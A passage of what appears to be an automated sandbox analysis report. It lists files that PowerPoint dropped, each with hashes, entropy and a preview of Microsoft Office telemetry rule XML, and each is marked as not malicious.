                                                                                                                              Entropy (8bit):3.9857348097565484
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2duKWhdRge+AuMqrKH+aKDH+a8R0B+AOL:cuTRgeJuMVe9ezR0YAOL
                                                                                                                              MD5:69D58B1B8AC1B0E51E20FE50352ABDAB
                                                                                                                              SHA1:2DA03C9206E19389CE104C24F2940E39055C4E27
                                                                                                                              SHA-256:C82B40E2804EFA42EE951193B75E9206544EB2F0AD1041ECEB91B082DF0BBFEC
                                                                                                                              SHA-512:C443326DE313C42D436C1B6D0540CA80A10595D595B4BF7A70FB548CFCE63880AA6A4F3FC4D2CF1C251DFEEE752953518D64570D887C185449C4FCF55897BC7B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11834" V="1" DC="SM" EN="Office.Outlook.Desktop.TcRebuild" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="500" DCa="PSU" xmlns="">.. <S>.. <Etw T="1" E="617" G="{2adf8e23-0af9-43c9-ba4c-952ee130540d}" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="NE">.. <L>.. <S T="1" F="Elapsed" />.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="NIDType" />.. </L>.. <R>.. <V V="14" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="NIDType" />.. </L>.. <R>.. <V V="16" T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1114
                                                                                                                              Entropy (8bit):5.249517661765813
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS1VzjKdRDDHwpat5rereMWasWWW+qDiVfuWSwieFUe3nlWfN1DS8BuM8BSuC:2dEgdRgeArT1ryndrm1m8BL8Br8ey8ed
                                                                                                                              MD5:E6381445D5F708EB0E67A1043824CBC3
                                                                                                                              SHA1:737D8C6A76D0E491A6FDDF46A074B2BCCB72D331
                                                                                                                              SHA-256:B7D27713A41349EF08D9CE4C89CF02041AF7460B2C3D08E38B46366F595D30BE
                                                                                                                              SHA-512:7346DA00663A90A543DFEC1ED74BECF8AE964EB43DCAC6E21ECCE5801B20CF08C15E2CBD49949A815CE033AE248A52D16F4178C821B98897901BC5BD1D01DA82
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11882" V="0" DC="SM" EN="Office.Outlook.Desktop.LokiSetAuthHeaderMetrics" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="1000" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="c9vi3" />.. <SR T="2" R="(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)-(.|)(.|)(.|)(.|)-(.|)(.|)(.|)(.|)-(.|)(.|)(.|)(.|)-(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)">.. <S T="1" F="CorrelationId" />.. </SR>.. </S>.. <C T="W" I="0" O="false" N="CorrelationId">.. <S T="2" F="Matched" />.. </C>.. <C T="U32" I="1" O="false" N="FinalResultTag">.. <S T="1" F="FinalResultTag" />.. </C>.. <C T="I64" I="2" O="false" N="FinalResultExtValue">.. <S T="1" F="FinalResultExtValue" />.. </C>.. <C T="B" I="3" O="false" N="RetryRequired">.. <S T="1" F="RetryRequired" />.. </C>.. <C T="U32" I="4" O="false" N="FirstAttemptResultTag">.. <S T="1" F="FirstAttemptResultTag" />.. </C>.. <C T="I64" I="5" O="false" N="FirstAttem
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1085
                                                                                                                              Entropy (8bit):4.619641857199903
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dpLVPPdRgeLrSovvS8TejqwOavTQjTFY7:cpLVPlRgeLOovvS8ToqQvWxY7
                                                                                                                              MD5:A78CD05D4968E74803650E9616CB5D51
                                                                                                                              SHA1:7D3B65A63702F71CE3F62D825DC468F09392321E
                                                                                                                              SHA-256:7704B1884E9A26D7716C3DD838B96EABAFA5A5E5D30F14C82855B44DAC636391
                                                                                                                              SHA-512:6F875F47D60B06AE032277760C4C10026D1EF69F3D6E604EF42250C902730B3CACE153F057E4E9CB6C55DA4FA74DAA0BC54C5DF557AA492DA6F7D45473E42101
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11890" V="0" DC="SM" EN="Office.Outlook.Desktop.Pcx.CCv2InCardNavigation" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="daprf" />.. <A T="2" E="TelemetryShutdown" />.. <TI T="3" I="Daily" />.. <F T="4">.. <O T="EQ">.. <L>.. <S T="1" F="FoundCard" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="EQ">.. <L>.. <S T="1" F="NavigatedToPersona" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="Count_Total">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="Count_FoundCard">.. <C>.. <S T="4" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="Count_NavigatedToPersona">.. <C>.. <S T="5" />.. </C>.. </C>.. <T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1212
                                                                                                                              Entropy (8bit):4.305751169482486
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dXrVr3r8ghrbzwJQkGqzGnZGn3zGnnGqzGnMFh:cX5rbhMJQkGqGZGjGnGqGMFh
                                                                                                                              MD5:CB85564EFD221EA611E0CB0E4DC0B4F4
                                                                                                                              SHA1:DFCC5D8936EAF3CECEF5CE9206EBAEE5621F6FE5
                                                                                                                              SHA-256:D94AEF86117BC93E5FF076CDCE1765DF5478AE7DB14F5372761B883522A1F0FA
                                                                                                                              SHA-512:BE02D932409309E5750E6FC3312671A5A1A5E80967280D84C368F6290D669CD691ABB6A9D518A7CFB96C4F5063B6AED458C2F288491337A5A572D19E688A4AD3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11930" V="0" DC="SM" T="Subrule" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="dfds5" />.. <UTS T="2" Id="dfds6" />.. <UTS T="3" Id="dfjbr" />.. <UTS T="4" Id="dfjbs" />.. <TO T="5" I="30s">.. <S T="1" />.. </TO>.. <A T="6" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="Id" />.. </S>.. <S T="2">.. <F N="Id" />.. </S>.. <S T="3">.. <F N="Id" />.. </S>.. <S T="4">.. <F N="Id" />.. </S>.. </G>.. <C T="U32" I="0" O="falseNoError">.. <O T="SUB">.. <L>.. <S T="4" F="TimeSinceEpochJS" />.. </L>.. <R>.. <S T="1" F="TimeSinceEpoch" />.. </R>.. </O>.. </C>.. <C T="U32" I="1" O="falseNoError">.. <O T="SUB">.. <L>.. <S T="2" F="TimeSinceEpoch" />.. </L>.. <R>.. <S T="1" F="TimeSinceEpoch" />.. </R>.. </O>.. </C>.. <C T="U32" I="2" O="falseNoError">.. <O T="SUB">.. <L>.. <S
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):569
                                                                                                                              Entropy (8bit):5.08920233705384
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdzVzj3dNPdRDDHwpat5ai0csr8/ByMhvNxpJNEuONO2su:2dz5PdRgeQcRmF
                                                                                                                              MD5:9AFF37E01EB10E158F597EA6E1200EE8
                                                                                                                              SHA1:C4264A3DBFC3AD5405E12F04F281C2D33D412AEE
                                                                                                                              SHA-256:05FA8A5BC0784F487B1706D63380E2B3B0F34AEE574674D310078D2DF8AB7C61
                                                                                                                              SHA-512:44116B0E2AF4F5EFE16A1CF57BF24B40680743888B1EDA11C9370E18E35A9EB9DDAEBA6BCB63FE462C72FDD913174ACC6A257155B153400862FF5619FDC6AE99
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11931" V="0" DC="SM" EN="Office.Outlook.Desktop.RNCardTimeToRender" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSP" xmlns="">.. <S>.. <R T="1" R="11930" />.. </S>.. <C T="U32" I="0" O="false" N="TimeToRenderInitial">.. <S T="1" F="0" />.. </C>.. <C T="U32" I="1" O="false" N="TimeToRenderContainer">.. <S T="1" F="1" />.. </C>.. <C T="U32" I="2" O="false" N="TimeToRenderPlaceHolder">.. <S T="1" F="2" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3232
                                                                                                                              Entropy (8bit):3.668625032816456
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d8sBdRge/cvvS8OrwOm6+Qr/Qt+qCm+aF2+yPwUUqbR1R97:c8WRge0vvS8U7ron/aoUUgfz7
                                                                                                                              MD5:558FA25A780A9E5DE8ED13A75878734B
                                                                                                                              SHA1:1C145DA0088A919E275021518112AEA0329590E4
                                                                                                                              SHA-256:341A12CAF0766CD590E3928288C2CECFE1F1141428CB74A429A51FBA348716F6
                                                                                                                              SHA-512:0F2376926E2BFEFA007BE39B5199D63EF0CFD0FA50DC170F5E1C1AC9203D5B0D73A0465475EABEA5F3E74C2BBF3BCA2EC3D2EA54424CAE97A74F611A6F75397E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11932" V="0" DC="SM" EN="Office.Outlook.Desktop.RNCardTimeToRenderInitialBucketed" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSP" xmlns="">.. <S>.. <R T="1" R="11930" />.. <A T="2" E="TelemetryShutdown" />.. <TI T="3" I="Daily" />.. <F T="4">.. <O T="LT">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="100" T="U32" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="100" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="LT">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="250" T="U32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="6">.. <O T="AND
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3343
                                                                                                                              Entropy (8bit):3.7999978378778105
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dxQBdRgeQrzvS8/UvwOHU2PUQHaUQZPU+LUKPUOsU6PUWaU8UUqbR1R97:cxyRgeQvvS8ODHU1zC4UUgfz7
                                                                                                                              MD5:D8461954EBFB716661E5BDF2FCAECA18
                                                                                                                              SHA1:B332465A784172E7FAFB36D8104D516C91216B7B
                                                                                                                              SHA-256:EEE0C229D39D77830C70AA685C3045446B05CA060542B7FA9DD596A230115833
                                                                                                                              SHA-512:D6FF65A7CF38783130FCAA5BF6EBD891777E77167F16A39647FC8D2A62322D48B86B853B301AC11E1399F715A3F31AB1DD895DD3659901E140F5379B2E2BF36D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11933" V="0" DC="SM" EN="Office.Outlook.Desktop.CCV2TimeToRenderInitialBucketed" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="dfds4" />.. <A T="2" E="TelemetryShutdown" />.. <TI T="3" I="Daily" />.. <F T="4">.. <O T="LT">.. <L>.. <S T="1" F="Milliseconds" />.. </L>.. <R>.. <V V="100" T="I32" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="1" F="Milliseconds" />.. </L>.. <R>.. <V V="100" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="LT">.. <L>.. <S T="1" F="Milliseconds" />.. </L>.. <R>.. <V V="250" T="I32" />.. </R>.. </O>.. </R>.. </O>.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):410
                                                                                                                              Entropy (8bit):5.24802525642993
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdbVzj9xdjdRDDHwpat5aerkDr8/MbNO2su:2db7dRgefrQx
                                                                                                                              MD5:29B4742E3E9098FBBDA01AA24762F903
                                                                                                                              SHA1:2188097389FCFE2AF0A7E39D3BE58A78AEBA44CF
                                                                                                                              SHA-256:83836DD02393239B51B179D9AC516EFA1416AC5292AA09BB49454645535DD458
                                                                                                                              SHA-512:DD119321EA9B63CD3092D06118C70F1F0E45DFEB505021E7F7DE4D60335B31A149427C12EA9DB73778B9569FC7156E1D056E003A78F348162B13AEB0247AE838
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11939" V="0" DC="SM" EN="Office.Outlook.Desktop.CCV2TimeToRenderInitial" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="dfds4" />.. </S>.. <C T="U32" I="0" O="false" N="TimeToRenderInitial">.. <S T="1" F="Milliseconds" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1286
                                                                                                                              Entropy (8bit):4.941151920409955
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dM8x6dRgebAuyRDu4Vcwgeg+6Kp5cTIBDR/B+SrCFG:cM8x2RgeMuyRS4VxQdIliFG
                                                                                                                              MD5:CE9B8DB9494922C8E502F0C849945E4F
                                                                                                                              SHA1:D1483FA4700903E0F8E99810F361EF8BC2621340
                                                                                                                              SHA-256:B15CE7950544B1699E8390054CC55E8D0F95DDBDECD043C1D16E22D2326AAC6D
                                                                                                                              SHA-512:BDC7FC89783ED7D1E12E19CAEA8CF94B08A83FB649579C7DD278385B8887397AAB497BD12F7227543978657B8AFAC5F6DE1EB5A94BACD328343E7FD829739282
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11950" V="0" DC="SM" EN="Office.Outlook.Desktop.Ndb.OpenedStats" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <Etw T="1" E="800" G="{2adf8e23-0af9-43c9-ba4c-952ee130540d}" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="ErrorCode" />.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </F>.. <A T="3" E="TelemetryShutdown" />.. </S>.. <G I="true" R="TriggerOldest">.. <S T="2">.. <F N="LocalStoreFullFilePath" />.. </S>.. </G>.. <C T="U32" I="0" O="false" N="NdbVersion">.. <S T="2" F="StoreVersion" />.. </C>.. <C T="U32" I="1" O="false" N="FileTypeMagicNumber">.. <S T="2" F="LocalStoreFileType" />.. </C>.. <C T="U64" I="2" O="false" N="FreeSpaceInFile">.. <S T="2" F="FreeSpaceWithinLocalStore" />.. </C>.. <C T="U64" I="3" O="false" N="FileSize">.. <S T="2" F="LocalStoreFileSize" /
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):487
                                                                                                                              Entropy (8bit):5.203053398959187
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdOVzj5d7jdRDDHwpatEerCefXFJnArQd7cHaSMNO/HNUlu:2dOPd7jdRgeLrCevvld7o7
                                                                                                                              MD5:8507C9CED3B6414E8F14B25E1555927B
                                                                                                                              SHA1:86A1E9B5331695D595BB7E4200DDCEBA6158709F
                                                                                                                              SHA-256:E0D836D4FA2CDB90B7D8930B43142500BA226A8D95EB91C238ED0396433F3CA8
                                                                                                                              SHA-512:0BD8108426058B10051B1BB679AB8D7BA0AD2ADBAA92F689751DD2B24DC19072DA1BB6E5733A4BB986F34227F236A6063D1BCF14D4A175A51B942E567BEBA979
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11981" V="0" DC="SM" EN="Office.Outlook.Desktop.CountOpenOutlookPropsDialog" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="9zwv1" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="CountOutlookPropsDialog">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):700
                                                                                                                              Entropy (8bit):5.2050849295587565
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdWVzjDdRDDHwpatEMuJe1zjFP9Asf5+AQxpbe/py4IMSe/jMSkNO2su:2dWxdRgeruEAsx+AQHehgejM
                                                                                                                              MD5:A6C4CF6994B6E5731403968AC85C282D
                                                                                                                              SHA1:6D2C8CC03EABE3162A4D0D6FD624337B971908FB
                                                                                                                              SHA-256:CE604316D3B48AF632D17E4E8DE9D769AD33E0D958A0BE8B2E0A0FCC98F05A09
                                                                                                                              SHA-512:556B01FB783C6E1D163509B4305E499199DCD246434147DF2F76192415509245A8B1277C7A7C8F305301D7DC41136A234E6C9AE8765C6B4509F80FFB3129F72D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11989" V="0" DC="SM" EN="Office.Outlook.Desktop.NDBCorruptStoreRuleSampled" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <Etw T="1" E="319" G="{2adf8e23-0af9-43c9-ba4c-952ee130540d}" />.. </S>.. <C T="U32" I="0" O="false" N="Context">.. <S T="1" F="Context" />.. </C>.. <C T="U32" I="1" O="false" N="NdbType">.. <S T="1" F="NdbType" />.. </C>.. <C T="U32" I="2" O="false" N="Version">.. <S T="1" F="Version" />.. </C>.. <C T="U32" I="3" O="true" N="CreatedWithVersion">.. <S T="1" F="CreatedWithVersion" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):999
                                                                                                                              Entropy (8bit):3.7018389810195864
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdMPOO+QMfXFJFfcJfikfGvX4OjPNeJH/M//a5eNX/c//fezPNuc3/8//lSJud:2dMP4QevWRQrPGOZPzqhH
                                                                                                                              MD5:0847565B252C325B0F3F4B65DDBF8CC2
                                                                                                                              SHA1:BBAE496C74DD0952DE4CFC8A2F86FD0A8A9BB3B8
                                                                                                                              SHA-256:0534C65211D5503B490BEED86790EE243C5DA900EADA1B419D593C90EE082A9E
                                                                                                                              SHA-512:D53981BFDDF765CA9E4544744A234B7FEF266DFA85700E51523E52D784B4EE955A670DA22A549EE53BCCDC4D2CE5A9007EC793A732202AB143DB6F27317C98FB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120100" V="3" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <A T="1" E="TelemetryStartup" />.. <A T="2" E="TelemetryResume" />.. <TI T="3" I="30s" />.. <R T="4" R="120100" />.. <TH T="5">.. <O T="GE">.. <L>.. <O T="COALESCE">.. <L>.. <S T="3" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="2" F="TimeStamp100ns" />.. </R>.. </O>.. </L>.. <R>.. <O T="ADD">.. <L>.. <O T="COALESCE">.. <L>.. <S T="4" F="TimeStamp100ns" />.. </L>.. <R>.. <V V="1" T="FT" />.. </R>.. </O>.. </L>.. <R>.. <V V="864000000000" T="U64" />.. </R>.. </O>.. </R>.. </O>.. </TH>.. </S>.. <T>.. <S T="1" />.. <S T="5" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2180
                                                                                                                              Entropy (8bit):4.4661937782352386
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dCdgIqmBrerZWianT2lPBPzaonzPbcPeHsK6P4P49XCJYP4PVdwiJW/+fikA9GR:cCawSEi4TghV/xakIGR
                                                                                                                              MD5:0BB16110449C6AD9F7E87A10F5B5976D
                                                                                                                              SHA1:907AFA5DAEA114422780FB2906930CB30017B450
                                                                                                                              SHA-256:C0513E3644466F11FE50B1434090E96D07966030BCD00E293506C763B6C6B7C9
                                                                                                                              SHA-512:8528BDB42A797D656FDA2F2BD061FDAAD38F74C4FF40FE79023E196A120D4A521C8C4375E91A3CE668DFAF3F2A0EA5C69A481DAB4F38C91AB31EBB9E7551F592
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120107" V="6" DC="SM" EN="Office.System.SystemHealthDesktopSessionLifecycleAndHeartbeat" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Lifecycle" />.. </RIS>.. <S>.. <UTS T="1" Id="awjb7" />.. <UTS T="2" Id="a14x3" />.. <SS T="3" G="{68442bc6-3519-4b08-a80c-e0a68fc8cda3}" />.. <TI T="4" I="Hourly" />.. <TR T="5" />.. <R T="6" R="120107" />.. <F T="7">.. <O T="NE">.. <L>.. <S T="1" F="Event" />.. </L>.. <R>.. <V V="3" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <C T="FT" I="0" O="false" N="Time">.. <O T="COALESCE">.. <L>.. <S T="2" F="SessionStartTime" />.. </L>.. <R>.. <S T="5" F="TimeStamp100ns" />.. </R>.. </O>.. </C>.. <C T="U8" I="1" O="false" N="State">.. <O T="COALESCE">.. <L>.. <S T="2" F="Event"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1012
                                                                                                                              Entropy (8bit):4.7979606654893825
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d0cbdJpIqGvlYrptc7XwzPbqVctTP1u7:c0On3mYtyAvj+
                                                                                                                              MD5:EF1D0AD755895588ADD7990A34BF5E96
                                                                                                                              SHA1:F084B03C5AEE3FD758DC41F60C5009E65307B9CA
                                                                                                                              SHA-256:68A4BA764A5160151D1742ECD989F845C99D913B1C6482B1706FA72C7C8F9C19
                                                                                                                              SHA-512:8A0AF04E08A873A2C5E046B19E858E4D1E46B5639BB6AF7E3E9BE3BABCE2264CB509B4684382D66C475166C4F1F3F2D21579CAC8F18D4DF8E9B23A4419744A7C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120110" V="4" DC="ESM" EN="Office.System.SystemHealthEssentialMetadataAllIdentities" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" T="Upload-Medium" DL="A" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <UTS T="1" Id="4v5ai" />.. <R T="2" R="120100" />.. <R T="3" R="120110" />.. </S>.. <G>.. <S T="1">.. <F N="IdentityUniqueId" />.. </S>.. <S T="3">.. <F N="1" />.. </S>.. </G>.. <C T="U32" I="0" O="false" N="IdentityType">.. <O T="COALESCE">.. <L>.. <S T="1" F="IdentityType" />.. </L>.. <R>.. <S T="3" F="0" />.. </R>.. </O>.. </C>.. <C T="G" I="1" O="true" N="IdentityUniqueId2">.. <O T="COALESCE">.. <L>.. <S T="1" F="IdentityUniqueId" M="Ignore" />.. </L>.. <R>.. <S T="3" F="1" />.. </R>.. </O>.. </C>.. <T>.. <S T="1" />.. <S T="2" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):707
                                                                                                                              Entropy (8bit):4.925273258562081
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdNTogoPln55QPwYHyj39Kmlwy+QMfiuficglVb5E7PNWXf/0//TfhmMNO/HNK:2dNkbd5yIqGvlMQ0HgPtEPQ7Y
                                                                                                                              MD5:9304104F8C87FCEC2DB52A8C8042FC9E
                                                                                                                              SHA1:EC55DC4144677CB28A90ADE379D0C1AC73F9ECF1
                                                                                                                              SHA-256:64082DD943016E01DCDAEE511DA17ADC5B9F8AD29C3FD7A929365D366887FD4D
                                                                                                                              SHA-512:E15DACA1D32B05D45A98AD89EA3697DD1CF7A32959F9001DABAD25257169583D4AD44277B01FDB9081A58CA2F4B44DBA41F76870D2C4AB2D59DED5C5F15C54D2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120112" V="1" DC="ESM" EN="Office.System.SystemHealthSessionStartTime" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" T="Upload-Medium" DL="A" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <A T="1" E="TelemetryStartup" />.. <R T="2" R="120100" />.. <R T="3" R="120112" />.. </S>.. <C T="FT" I="0" O="false" N="SessionStart">.. <O T="COALESCE">.. <L>.. <S T="1" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="3" F="0" />.. </R>.. </O>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. <S T="3" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1330
                                                                                                                              Entropy (8bit):4.555072319833569
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dfdXaIqmlXeWrZr2Q6P4Pv9kCkP4P/wd5ijh:cfQyOWthh
                                                                                                                              MD5:502142DA94231A63C8DDA56CABB73744
                                                                                                                              SHA1:523E38AA9296209FC88DCE6E36210B58CE5B4557
                                                                                                                              SHA-256:0AB960FF92024AD83697E463441B9C44AC129D5EFE988A5099C1D7A56D86BAB2
                                                                                                                              SHA-512:1A695C552B00DB8C697E754FCA14A9543F47000A5695417A72874B55FDAA48C304A565F4F651244B914AA46741643118F61777E43FF2DCA64D801961020AA1E3
                                                                                                                              Malicious:false
